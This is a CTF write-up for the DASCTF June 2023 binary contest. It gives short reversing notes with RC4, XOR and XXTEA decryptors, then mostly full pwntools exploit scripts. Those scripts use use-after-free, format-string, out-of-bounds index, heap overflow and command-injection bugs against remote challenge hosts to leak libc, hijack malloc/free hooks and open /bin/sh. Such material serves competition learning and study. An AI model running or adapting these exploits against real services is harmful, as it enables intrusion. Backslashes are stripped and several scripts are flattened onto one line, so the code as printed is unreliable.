DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC



01

Re

1

careful

沙箱跑一下

DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC

2

babyRe

API反调试绕过+SMC+去花指令+RC4魔改

#include <stdio.h>
#include <string.h>

/*
 * Key schedule of the challenge's modified RC4 ("RC4魔改").
 *
 * s   : 256-byte state array, filled in place.
 * key : key bytes; the schedule always reads key[0..9] (i % 0xa), so the
 *       caller must supply at least 10 bytes whatever len says.
 * len : not used by this routine; the key length is hard-coded to 10.
 *
 * Deviates from textbook RC4 in the swap index: j = 2*j + s[i] + k[i]
 * instead of j = j + s[i] + k[i]. A standard RC4 implementation therefore
 * yields a different state for the same key, which is the point of the
 * modification.
 */
void rc4_init(unsigned char *s, unsigned char *key, unsigned long len)
{
    unsigned char k[256];
    unsigned int idx;
    unsigned int j = 0;

    (void)len;

    /* Identity permutation plus the 10-byte key repeated to 256 bytes. */
    for (idx = 0; idx < 256; idx++) {
        s[idx] = (unsigned char)idx;
        k[idx] = key[idx % 0xa];
    }

    /* Modified KSA swap loop. */
    for (idx = 0; idx < 256; idx++) {
        unsigned char swap;
        j = (2 * j + s[idx] + k[idx]) % 256;
        swap = s[idx];
        s[idx] = s[j];
        s[j] = swap;
    }
}

/*
 * In-place keystream application of the modified RC4 (PRGA), used by main
 * as the decryptor.
 *
 * s    : state prepared by rc4_init; advanced in place.
 * data : buffer of len bytes, transformed in place.
 * len  : number of bytes to process.
 *
 * Two deviations from textbook RC4: i advances by j (i = i + j) rather than
 * by 1, and the keystream index is t = s[i] + j + s[j]. Before the XOR,
 * byte k is decremented by (k % 0xD); because of that subtraction the
 * routine is not its own inverse, so it only decrypts.
 */
void rc4_crypt(unsigned char *s, unsigned char *data, unsigned long len)
{
    unsigned int i = 0;
    unsigned int j = 0;
    unsigned long pos;

    for (pos = 0; pos < len; pos++) {
        unsigned char swap;
        unsigned int t;

        /* Undo the per-position offset the challenge adds before RC4. */
        data[pos] -= pos % 0xD;

        i = (i + j) % 256;
        j = (j + s[i]) % 256;
        swap = s[i];
        s[i] = s[j];
        s[j] = swap;

        t = (s[i] + j + s[j]) % 256;
        data[pos] ^= s[t];
    }
}

/*
 * Recovers the flag from the babyRe ciphertext: dumps the scheduled state
 * as hex, decrypts the 44 embedded bytes, and prints the result with its
 * length.
 */
int main(void)
{
    unsigned char s[256] = {0};
    unsigned char key[10] = {0x5d, 0x42, 0x62, 0x29, 0x03, 0x36, 0x47, 0x41, 0x15, 0x36};
    /* 44 ciphertext bytes, none of them zero; element 45 is the implicit
     * NUL that strlen() stops at. */
    unsigned char data[45] = {
        0xf7, 0x2e, 0x34, 0xf0, 0x72, 0xcf, 0x5e, 0x0a, 0xbb, 0xec, 0xb1,
        0x2b, 0x70, 0x88, 0x88, 0xed, 0x46, 0x38, 0xdb, 0xda, 0x6c, 0xbd,
        0xd4, 0x06, 0x77, 0xf2, 0xcf, 0x56, 0x88, 0xc6, 0x31, 0xd2, 0xb7,
        0x5a, 0xc1, 0x42, 0xb0, 0xf4, 0x48, 0x37, 0xf5, 0x2c, 0xf5, 0x58};
    unsigned long len = strlen((char *)data);
    int idx;

    rc4_init(s, key, len);          /* 初始化得到s */

    /* Debug dump of the scheduled state, one hex byte per column. */
    for (idx = 0; idx < (int)sizeof(s); idx++) {
        printf("%02X ", s[idx]);
    }

    rc4_crypt(s, data, len);        /* 解密 */
    printf("解密后为:%s,%lu", data, strlen((char *)data));
    return 0;
}

3

ez_exe

python3.11反编译+XXTEA

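import ctypes
from time import *
from ctypes import *
from ctypes import wintypes
from hashlib import md5


class _STARTUPINFO(Structure):
    """ctypes mirror of the Win32 STARTUPINFO struct.

    Declared by the decompiled script; nothing below reads it, so it is kept
    only to preserve the module's names.
    """
    _fields_ = [
        ('cb', c_ulong),
        ('lpReserved', c_char_p),
        ('lpDesktop', c_char_p),
        ('lpTitle', c_char_p),
        ('dwX', c_ulong),
        ('dwY', c_ulong),
        ('dwXSize', c_ulong),
        ('dwYSize', c_ulong),
        ('dwXCountChars', c_ulong),
        ('dwYCountChars', c_ulong),
        ('dwFillAttribute', c_ulong),
        ('dwFlags', c_ulong),
        ('wShowWindow', c_ushort),
        ('cbReserved2', c_ushort),
        ('lpReserved2', c_char_p),
        ('hStdInput', c_ulong),
        ('hStdOutput', c_ulong),
        ('hStdError', c_ulong)]


class _PROCESS_INFORMATION(Structure):
    """ctypes mirror of the Win32 PROCESS_INFORMATION struct (unused, see above)."""
    _fields_ = [
        ('hProcess', c_void_p),
        ('hThread', c_void_p),
        ('dwProcessId', c_ulong),
        ('dwThreadId', c_ulong)]


StartupInfo = _STARTUPINFO()
ProcessInfo = _PROCESS_INFORMATION()

# The embedded stage is XOR-obfuscated with the 32-char hex digest of
# md5(b'bin1bin1bin1'), repeated over the whole file. hexdigest() already
# returns str, so .encode() alone gives the bytes key (the original wrapped it
# in a redundant bytes()). The writeup notes pycdc did not recover this loop
# and it was reconstructed from the bytecode by hand.
key1 = md5(b'bin1bin1bin1').hexdigest().encode()

# Original left both file handles open; context managers close them.
with open('./task 2/bin1', 'rb') as src:
    file = src.read()

# Repeating-key XOR is a decoder, not encryption: the key is fully derived
# from the constant above, which is exactly the kind of static artefact
# (md5 of a short literal) a detection rule for such unpackers keys on.
arr = [key1[i % len(key1)] ^ file[i] for i in range(len(file))]

with open('bin3', 'wb') as dst:
    dst.write(bytes(arr))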

用key bin2bin2bin2去解bin2

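#include <stdio.h>
#include <stdlib.h>

/* Challenge-specific XXTEA delta (the reference cipher uses 0x9E3779B9). */
#define delta 0x7937B99E

/*
 * Decrypts the 11-word ciphertext recovered from the ez_exe challenge with
 * its 128-bit key and prints the plaintext as raw bytes.
 *
 * This is XXTEA decryption with two challenge-specific changes: the custom
 * delta above and a round count of 52/n (the reference cipher uses
 * 6 + 52/n). Both must match the encryptor exactly or the output is noise.
 *
 * Fix relative to the published listing: the indices v[p-1] and v[p] in the
 * inner loop were lost in formatting (they rendered as a bare "v"). They are
 * restored from the reference XXTEA structure, which the surviving
 * v[n-1] / v[0] tail of each round already follows.
 */
int main(void)
{
    unsigned int v[11] = {0xCC45699D, 0x683D5352, 0xB8BB71A0, 0xD3817AD,
                          0x7547E79E, 0x4BDD8C7C, 0x95E25A81, 0xC4525103,
                          0x7049B46F, 0x5417F77C, 0x65567138};
    unsigned int key[4] = {0x00004B5F, 0x0000DEAD, 0x000011ED, 0x0000B3CC};
    unsigned int sum, y, z, p, rounds, e;
    int n = 11;
    int i;

    rounds = 52 / n;
    y = v[0];
    sum = rounds * delta;   /* start from the encryptor's final sum */
    do {
        e = (sum >> 2) & 3;
        for (p = n - 1; p > 0; p--) {
            z = v[p - 1];
            v[p] -= ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
                     ^ ((key[(p & 3) ^ e] ^ z) + (y ^ sum)));
            y = v[p];
        }
        /* p == 0 here, so key[(p ^ e) & 3] == key[e]. */
        z = v[n - 1];
        v[0] -= (((key[(p ^ e) & 3] ^ z) + (y ^ sum))
                 ^ (((y << 2) ^ (z >> 5)) + ((z << 4) ^ (y >> 3))));
        y = v[0];
        sum -= delta;
    } while (--rounds);

    /* Each 32-bit word is emitted little-endian (byte 0 first); the
     * original also carried a commented-out big-endian variant. */
    for (i = 0; i < n; i++) {
        printf("%c%c%c%c",
               *((char *)&v[i] + 0), *((char *)&v[i] + 1),
               *((char *)&v[i] + 2), *((char *)&v[i] + 3));
    }
    return 0;
}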

02

Pwn

1

easynote

#coding:utf-8
# Writeup exploit for the "easynote" pwn challenge. The remote side loads
# libc-2.23.so (no tcache, writable malloc hooks). Reference copy only: the
# publishing pipeline stripped every backslash, so escapes such as 'x7f' and
# 'x00' below lack their '\' and the script cannot run as printed; it is also
# Python 2 pwntools (str payloads, generator .next()).
#
# Target defect the interaction exposes: a note is shown (show(0)) and edited
# (edit(1, ...)) after it was deleted, i.e. the service keeps a dangling
# pointer in its note table. Nulling the slot on delete and rejecting indices
# that are not in use removes the primitive; the hook overwrite used below is
# additionally moot on glibc >= 2.34, which no longer honours __malloc_hook.
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
  # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    # gdb command string for gdb_attach; left exactly as printed (its line
    # breaks were lost with the rest of the formatting).
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :
      # No argument: local process with the system libc, gdb attach enabled.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=process(elfelf)
      gdb_open=1
      # io=process(['./'],env={'LD_PRELOAD':'./'})
      clibc.srand(clibc.time(0))  # seeds libc rand() via ctypes; nothing below uses it
      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      # Presumably one_gadget offsets (sic "gadgaet"); only 0xf03a4 is used,
      # and it is hard-coded below rather than taken from this list.
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
      # Any argument: remote challenge host with the challenge's libc.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=remote('node4.buuoj.cn',29223)
      gdb_open=0
      clibc.srand(clibc.time(0))
      libc=ELF('./libc-2.23.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):
      # Attach gdb with command string a, only in the local configuration.
      if gdb_open==1 :
        gdb.attach(io,a)
    def choice(a):
      # Menu selection; 'exitn' is 'exit\n' with the backslash lost.
      io.sendlineafter('5. exitn',str(a))
    def add(a,b):
      # Menu 1: new note of size a with content b.
      choice(1)
      io.sendlineafter('--->n',str(a))
      io.sendafter('--->n',b)
    def edit(a,c,b):
      # Menu 2: rewrite note a with c bytes of b.
      choice(2)
      io.sendlineafter('--->n',str(a))
      io.sendlineafter('--->n',str(c))
      io.sendafter('--->n',b)
    def show(a):
      # Menu 4: print note a.
      choice(4)
      io.sendlineafter('--->n',str(a))
    def delete(a):
      # Menu 3: free note a.
      choice(3)
      io.sendlineafter('--->n',str(a))
    add(0xf8,'aaa')
    add(0x68,'aaa')
    delete(0)
    # Reading a freed note: the leaked pointer is a libc address, from which
    # the libc base is derived (the -88-0x10 adjustment is the author's
    # empirically determined offset for this libc).
    show(0)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/shx00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    # Writing to a freed note (second use of the dangling pointer).
    delete(1)
    edit(1,0x8,p64(libc.sym['__malloc_hook']-0x23))
    add(0x68,'aaa')
    add(0x68,'x00'*0x13+p64(libc_base+0xf03a4))
    delete(0)
    # delete(0)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb_attach(io,gdb_text)
    io.interactive()
  # except Exception as e:
  #   io.close()
  #   continue
  # else:
  #   continue

2

fooooood

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b *$rebase(0xB27)  '''if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :  io=remote('node4.buuoj.cn',29176)  gdb_open=0  libc=ELF('./libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)io.sendlineafter('name:','keer')def go(a):  io.sendlineafter('favourite food: ',a)go('%8$p%9$p%11$p')io.recvuntil('You like ')elf_base=int(io.recv(14),16)-0xb60libc_base=int(io.recv(14),16)-libc.sym['__libc_start_main']-240libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']printf_got=libc_base+0x202028stack_addr=(int(io.recv(14),16)-0x3518+0x3424)&0xffffpay='%'+str(stack_addr)+'c%11$hn'go(pay)go('%255'+'c%37$hhn')def fmt(addr,value):  pay='%'+str(addr&0xffff)+'c%11$hn'  go(pay)  off_1=(value)&0xff  go('%'+str(off_1)+'c%37$hhn')  for i in range(5):    pay='%'+str((addr+1+i)&0xff)+'c%11$hhn'    go(pay)    off_1=(value>>((i+1)*8))&0xff    go('%'+str(off_1)+'c%37$hhn')fmt(stack_addr+0xc+8,libc_base+one_gadgaet[3])for i in range(248):  io.sendline('')success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()

3

Candy_Shop

#coding:utf-8
# Writeup exploit for the "Candy_Shop" pwn challenge. Reference copy only:
# the published listing lost every backslash ('x7fn', '/bin/shx00'), and the
# script is Python 2 pwntools (str payloads, .next()).
#
# Two target defects the interaction exposes: show('%31$p') is echoed through
# printf as a format string (a libc return address comes back as hex), and
# the purchase index accepts negative values (-2, -10, -9), so the index has
# no lower-bound check and writes land in front of the item table. The fixes
# are printf("%s", ...) and a signed range check (0 <= idx < count) before
# every table access.
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
  # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    # gdb command string; left exactly as printed (line breaks lost).
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :
      # No argument: local process with the system libc, gdb attach enabled.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=process(elfelf)
      gdb_open=1
      # io=process(['./'],env={'LD_PRELOAD':'./'})
      clibc.srand(clibc.time(0))  # seeds libc rand() via ctypes; unused below
      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]  # one_gadget offsets (sic); unused here
    else :
      # Any argument: remote challenge host with the challenge's libc.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=remote('node4.buuoj.cn',27065)
      gdb_open=0
      clibc.srand(clibc.time(0))
      libc=ELF('./libc.so.6')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):
      # Attach gdb with command string a, only in the local configuration.
      if gdb_open==1 :
        gdb.attach(io,a)
    def choice(a):
      # Menu selection; this binary takes letters ('b', 'g'), not numbers.
      io.sendlineafter('option: ',a)
    def add(a,b,c):
      # 'b'uy: item a, index b (sent as given, may be negative), content c.
      choice('b')
      io.sendlineafter('Which one you want to bye: ',a)
      io.sendlineafter(': ',b)
      io.sendafter(': ',c)
    def edit(a,b):
      # Template leftover: numeric option 2 with Index/content prompts; unused.
      choice(2)
      io.sendlineafter('Index:',str(a))
      io.sendafter('content:',b)
    def show(a):
      # 'g': the argument is echoed back, hence the format-string leak.
      choice('g')
      io.sendlineafter(': n',a)
    def delete(a):
      # Template leftover: numeric option 4; unused.
      choice(4)
      io.sendlineafter('Index:',str(a))
    show('%31$p')
    io.recvuntil('0x')
    # 12 hex digits of the leaked __libc_start_main return site -> libc base.
    libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main']-128
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/shx00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    # Negative indices write in front of the table; the exact targets are
    # not recoverable from this listing alone.
    add('t','-2','a'*6+'99999n')
    add('t','-10',p64(libc.sym['puts'])[0x2:]+p64(libc.sym['printf'])+p64(system_addr)[:5])
    add('t','-9','x7fn')
    add('t','0','/bin/shn')
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)
    io.interactive()
  # except Exception as e:
  #   io.close()
  #   continue
  # else:
  #   continue

4

Approoooooooaching

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./bf'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      b *$rebase(0x15B9)      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')      io=remote('139.155.140.235',9999)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('choice: n',str(a))    def add(a,b):      choice(1)      io.sendlineafter('size: ',str(a))      choice(2)      io.sendafter('text: ',b)    def bf():      choice(3)    def run():      choice(4)    add(0xfff,'ix'*0x4+'yyy')    gdb_attach(io,gdb_text)    bf()    io.sendafter('choice: n','4n')    io.send('xE0')    # success('heap_base:'+hex(heap_base))    io.interactive()  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

5

server

通过动调可以发现access校验的路径是有限长度,可以把后面的.key给顶掉,然后写入过长的字符串会覆盖到命令注入读取的内容,因此只要在最后执行/bin/sh #,并通过单引号闭合参数即可。

#!usr/bin/env python #coding=utf-8from pwn import *from ctypes import CDLLcontext(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('./pwn_7')DEBUG = 0if DEBUG:    gdbOpen = 1    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')    p = process('./pwn_7')else:    gdbOpen = 0    ip = 'node4.buuoj.cn'    port = 25599    p = remote(ip, port)    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')def debug(info="b main"):    if gdbOpen == 1:        gdb.attach(p, info)        #gdb.attach(p, "b *$rebase(0x)")debug('b *$rebase(0x0000000000001495)')p.sendlineafter(b'>> ', b'1')p.sendlineafter(b'admin : n', b'../../../../../././bin/sh #')p.sendlineafter(b'>> ', b'2')p.sendlineafter(b'add : n', b"'")p.interactive()

6

can_you_find_me

#coding:utf-8
# Writeup exploit for the "can_you_find_me" pwn challenge (glibc 2.27 per
# the libc paths below). Reference copy only: every backslash was lost in
# publishing ('x00'*0x1f0, 'x60x77', '/bin/shx00'), and the script is
# Python 2 pwntools (str payloads, .next()).
#
# Target defect the interaction exposes: add(0x1f8, ...) fills a 0x1f8-byte
# allocation and then the size field of the following chunk (p64(0x900)),
# i.e. the service writes past the end of a note buffer. Overlapping chunks
# obtained that way are later used to alter _IO_2_1_stdin_ and __free_hook.
# Mitigations: bound the copy to the allocation size; on the platform side
# glibc >= 2.34 no longer honours __free_hook, and glibc's
# "tcache"/"safe-linking" checks (2.32+) make the overlapping-chunk step
# considerably harder.
#
# The outer while/try retries the whole session on any exception, which is
# how the 1-in-16 guess in add(0x1e0, 'x60x77n') is brute-forced; as written
# it also swallows unrelated failures (connection refused, bad prompt text)
# forever -- a retry budget would be the minimal fix.
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./pwn'
#context.arch='amd64'
while True :
  try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    # gdb command string; left exactly as printed (line breaks lost).
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :
      # No argument: local process; ELF symbols from a local 2.27 build.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=process(elfelf)
      gdb_open=1
      # io=process(['./'],env={'LD_PRELOAD':'./'})
      clibc.srand(clibc.time(0))  # seeds libc rand() via ctypes; unused below
      libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]  # one_gadget offsets (sic); unused here
    else :
      # Any argument: remote challenge host, 2.27 libc from glibc-all-in-one.
      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
      io=remote('node4.buuoj.cn',27065)
      gdb_open=0
      clibc.srand(clibc.time(0))
      libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')
      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):
      # Attach gdb with command string a, only in the local configuration.
      if gdb_open==1 :
        gdb.attach(io,a)
    def choice(a):
      io.sendlineafter('choice:',str(a))
    def add(a,b):
      # Menu 1: allocate a bytes and fill with b.
      choice(1)
      io.sendlineafter('Size:',str(a))
      io.sendafter('Data:',b)
    def edit(a,b):
      # Template leftover: same menu number as delete; never called.
      choice(2)
      io.sendlineafter('Index:',str(a))
      io.sendafter('content:',b)
    def show(a):
      # Menu 3; never called (the leak comes back through stdin handling).
      choice(3)
      io.sendlineafter('Index:',str(a))
    def delete(a):
      # Menu 2: free note a. NOTE(review): edit() above also sends 2; looks
      # like a copy-paste slip in the unused helper rather than in this one.
      choice(2)
      io.sendlineafter('Index:',str(a))
    # Heap layout: six notes, then frees and an oversize write that stamps
    # 0x900 into the neighbouring chunk's size field.
    add(0x4f0,'aaan')
    add(0xf0,'aaan')
    add(0xf0,'aaan')
    add(0x1f0,'aaan')
    add(0x4f0,'aaan')
    add(0xf0,'aaan')
    delete(0)
    delete(3)
    add(0x1f8,'x00'*0x1f0+p64(0x900))
    delete(4)
    delete(1)
    delete(0)
    add(0x4f0,'n')
    # Two-byte partial overwrite; the upper nibble is ASLR-dependent, hence
    # the retry loop around the session.
    add(0x1e0,'x60x77n')
    add(0xf0,'aaan')
    # 0xfbad1887 is a _IO_FILE flags value; the stdin object is rewritten so
    # that its next read echoes libc memory back, giving the libc base.
    add(0xf0,p64(0xfbad1887)+p64(0)*3+'xc8'+'n')
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/shx00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    add(0x110,'/bin/shx00'+p64(0x1f8)+p64(free_hook_addr)+'n')
    add(0x1f0,'/bin/shx00n')
    add(0x1f0,p64(system_addr)+'n')
    delete(6)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)
    io.interactive()
  except Exception as e:
    # Any failure (including a wrong ASLR guess) restarts the session.
    io.close()
    continue
  else:
    continue

7

matchmaking platform

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''  '''if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :  io=remote('node4.buuoj.cn',25131)  gdb_open=0  libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)# io.sendafter('>> ','a'*0x80+'x60')# io.sendafter('>> ','x18n')# io.sendafter('>> ','a'*0x80+'x60')# io.sendafter('>> ','x18n')io.sendafter('>> ','a'*0x80+'x80')io.sendafter('>> ',p64(0xfbda1887)+p64(0)*3+'x08n')libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']io.sendafter('>> ','a'*0x80+'x60')io.sendafter('>> ',p64(free_hook_addr)+'x05n')io.sendafter('>> ','a'*0x80+'x60')io.sendafter('>> ',p64(system_addr)+'n')io.sendafter('>> ','a'*0x80+'xc8')io.sendafter('>> ','/bin/shx00'+'n')# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()


原文始发于微信公众号(EDI安全):DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC
